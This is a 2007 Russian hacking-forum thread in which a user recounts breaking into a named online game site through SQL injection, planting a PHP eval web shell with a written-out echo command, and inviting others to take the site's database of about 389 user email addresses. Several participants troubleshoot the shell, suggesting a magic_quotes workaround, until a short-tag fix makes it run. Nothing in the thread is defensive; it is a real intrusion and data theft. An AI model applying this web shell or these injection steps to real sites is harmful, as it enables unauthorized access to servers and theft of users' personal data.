Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Сломал сайт, залил Php файл, а ничё не работает! (https://forum.antichat.xyz/showthread.php?t=30838)

Ponchik 09.01.2007 02:21
Сломал сайт, залил Php файл, а ничё не работает!
 
Хай! Вот нащёл сайт!
_http://jeux-mu-sacre-online.no-ip.org/
Нащёл в нём SQL Injection, выполнил команду
echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php
Файл создался, но...
http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123';
И ничего... В общем если кому удасться разобраться в чём проблема, раскажите :) А БД можете себе брать, тама MSSQL в
БД: MuOnline
Таблица: MEMB_INFO
Колонка: mail_addr
Хранятся мыльники юзверей (я так понимаю их тама только 389 :( )
В общем очень интересно где скривили мои руки, почему сервер не слушает меня :mad:

sunb0rn 09.01.2007 02:43
А ты посмотри в сорсаx что делается ;) - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!

}{0TT@БЬ)Ч 09.01.2007 02:46
ссылку на саму sql Injection!В студию.

Ponchik 09.01.2007 03:02
sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
Я так много раз делал, всё работало, а вот тут нехочет...

GreenBear 09.01.2007 03:20
sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
Ponchik, посмотри код страницы) пхп не обрабатывается.

Ponchik 09.01.2007 03:47
Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...

GreenBear 09.01.2007 03:51
Цитата:
а так всё фурычит...
http://netsec.ru/uploads/green/vn4ki...qU0snap085.jpg
не спорь ((=

Ponchik 09.01.2007 04:04
Позволь поспорить
http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg

GreenBear 09.01.2007 04:06
я про сайт :d

max_pain89 09.01.2007 04:16
если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))

Ponchik 09.01.2007 04:23
Green_Bear, в смысле про сайт... Вот я на локалхосте проверил и показал!
max_pain89, ты про ' превращается в \' ? Для этого я юзаю stripslashes() он исправляет этот баг
Да и твой вариант всёравно не работает, бнсполезно я так понимаю пытаться, потому-что я и copy("шелл","Системный путь") проблвал, нефурычит! Странно...

TANZWUT 09.01.2007 05:11
кароч понял что за фишка... у меня тож wamp стоял... долго не мог допереть почему мои скрипты так же не пашут =)))
оказываецо надо делать так <?php eval(stripslashes($_GET[c])); ?> ;)

Ponchik 09.01.2007 05:22
Ёшкин кот! Ядрён батон! Работает! Спасибо!


Время: 14:34